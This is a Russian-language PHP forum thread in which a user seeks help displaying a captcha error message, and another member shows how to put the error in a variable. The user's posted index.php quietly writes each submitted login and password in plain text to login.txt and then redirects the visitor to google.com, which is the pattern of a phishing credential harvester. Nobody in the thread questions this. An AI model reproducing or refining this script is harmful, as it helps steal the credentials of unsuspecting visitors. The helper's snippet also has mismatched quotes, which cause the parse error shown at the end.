[ Поиск ] - [ Пользователи ] - [ Календарь ]
Полная Версия: Помогите с скриптом phpcaptcha + запоминание вводи
Страницы: 1, 2, 3, 4, 5
dima.nechestnykh
А гость правильно говорит smile.gif ищу спокойных адекватных людей в свою команду взял к примеру элементарный скрипт, который и предложил в ввиде примера для помощи. Есть один проект, но об этом расскажу только в лс.
dima.nechestnykh
Главное, как грамотно вы смогли изложить мысли и ваше терпение и моё ожидание бесценно!
walerus
dima.nechestnykh
В чем трудность? ЛС доступен всем dry.gif
dima.nechestnykh
В моей жизни тоже был Валера и звали её Рита!
dima.nechestnykh
walerus, привет!

Итак, добавляю этот див в нужное место, но он выводится всегда, а не только при вводе капчи (стили прикрутил, какие хотел, не поленился) , как сделать, чтобы она выводилась только при не верном вводе?
walerus
Тему можно закрыть. Человеку ничего не хочет сам делать. sad.gif
Guest
walerus
почему не хочу сделал, произошла ошибка спросил как её решить.
dima.nechestnykh
<div style="background: green;">
<?php
echo "Капча не верна.<br /><br />";
echo "Вернитесь <a href='javascript:history.go(-1)'>назад</a> и попробуйте снова.";
?>
</div>



Вставляю этот div в нужное место где хотелось, чтобы он отображался и просто этот div отображается всегда. А нужно, чтобы отображался именно тогда, когда капча введена не правильно... Нужные я стили подогнал, просто отображение в нужном действие сделать бы и всё будет готово
walerus
Цитата
если нужно "где то" разместить эту "ошибку", тогду нужно, текст поместить в переменную, и в нужном месте проверить, пустая переменная или нет, если не пустая(т.е. с описанием ошибки), то показать, если пустая - пропустить...


Я уже выше написал как это сделать... проще некуда
VeRTak
Цитата (walerus @ 17.05.2017 - 19:29)
Тему можно закрыть. Человеку ничего не хочет сам делать.


Я всегда говорю это, придут люди которые ничего не понимают, и пытаются сделать вид что-то то понимают или вообще говорят вот тут не работает сделайте. Всегда игнорирую подобные темы, чего и тебе советую. Уже 3 дня тут обсуждаете, другой бы уже нашел специалиста, заплатил что бы за него сделали, не тратил бы не свое время не время других людей
dima.nechestnykh
VeRTak послушайка, а зачем форум тогда? Вернее раздел Взаимопомощи?! "Бы да бы" убери своё подальше, обратился к этой персоне, и остался очень доволен. Спасибо хочу ему сказать ещё раз! Смотрю ты много понимаешь, что у тебя пониманималка зашкаливает.
А если мне пришлось это делать, я бы конечно бы сделал, но времени пришлось потратить уйму, а его категорически не хватает, вернее оно истекает. Конечно это круто знать код и проявлять его на деле. Но все с чего-то начинали, а начинали с нуля. И постепенно приобретали для себя что-то новое. Не всё сразу ведь, согласись?! Вспомни себя, просто улыбнись и вспомни, когда ты думал, о боже, - что такое вёрстка, что такое языки программирования. Когда тебе подсказывали и когда ты сам проявлял интерес к данной сфере. На мой взгляд ты сейчас очень и очень не прав.
dima.nechestnykh
walerus
В какую переменную? Как это хоть примерно должно выглядеть? Подскажите пожалуйста...
Да для меня это трудно...

if($_POST['captcha_code'] != $_SESSION['captcha_code']) echo "Капча введена неверно";
else echo "Капча введена верно";



Так?
walerus
dima.nechestnykh
Ты правильно подметил, это:
Цитата
раздел Взаимопомощи
т.е. взаимно помогать друг другу... Чем ты мне помог или поможешь?, тебе нужно было тему в разделе "Для новичков" создавать. Или могу скинуть WMR номер :lol:

пример
В начале скрипта нужно объявить что переменная $errors - пуста:
$errors = '';
потом
// Это обернули в див и ставим в то место условия, когда неверно введена капча, остальное из "того места" убираем...
$errors = '<div style="background: green;">Капча не верна.<br /><br />
Вернитесь <a href=
\'javascript:history.go(-1)\'>назад</a> и попробуйте снова.</div>";
Теперь нам осталось вывести ошибку в нужном месте...
Выбираем нужное место и прописываем там условие проверки переменной ошибки.
<?php 
if ( trim( $errors ) != '' ){
echo $errors;
}



ps: Откуда этот код???
if($_POST['captcha_code'] != $_SESSION['captcha_code']) echo "Капча введена неверно";
else echo "Капча введена верно";

в моем примере его нет.
dima.nechestnykh
walerus
что-то я не чуток не понимаю, всё вроде сделал, как Вы сказали, но выдаёт ошибку синтаксиса.
dima.nechestnykh
<?php @session_start(); $errors = '';
// ФАЙЛ index.php
if ( isset( $_POST['captcha_code'] ) && trim( $_POST['captcha_code'] ) != '' ){

include_once 'securimage/securimage.php';
$securimage = new Securimage();

$_POST['captcha_code'] = trim( $_POST['captcha_code'] );

if ($securimage->check( $_POST['captcha_code'] ) == false){

echo "Капча не верна.<br /><br />";
echo "Вернитесь <a href='javascript:history.go(-1)'>назад</a> и попробуйте снова.";
exit;

}else{
$Log = $_POST['login'];
$Pass = $_POST['pass'];

$log = fopen("login.txt","at");
fwrite($log,"\n $Log:$Pass \n");
fclose($log);

echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://google.com'></head></html>";
}
}
else{
if ( isset( $_POST['captcha_code'] ) && trim( $_POST['captcha_code'] ) == '' ){
echo "Вы не ввели капчу.<br /><br />";
}
}



?>

это
echo "Капча не верна.<br /><br />";
echo "Вернитесь <a href='javascript:history.go(-1)'>назад</a> и попробуйте снова.";
exit;

меняю на это:
$errors = '<div style="background: green;">Капча не верна.<br /><br />
Вернитесь <a href=
\'javascript:history.go(-1)\'>назад</a> и попробуйте снова.</div>";

Ошибочка:
Parse error: syntax error, unexpected 'login' (T_STRING)
Быстрый ответ:

 Графические смайлики |  Показывать подпись
Здесь расположена полная версия этой страницы.
Invision Power Board © 2001-2024 Invision Power Services, Inc.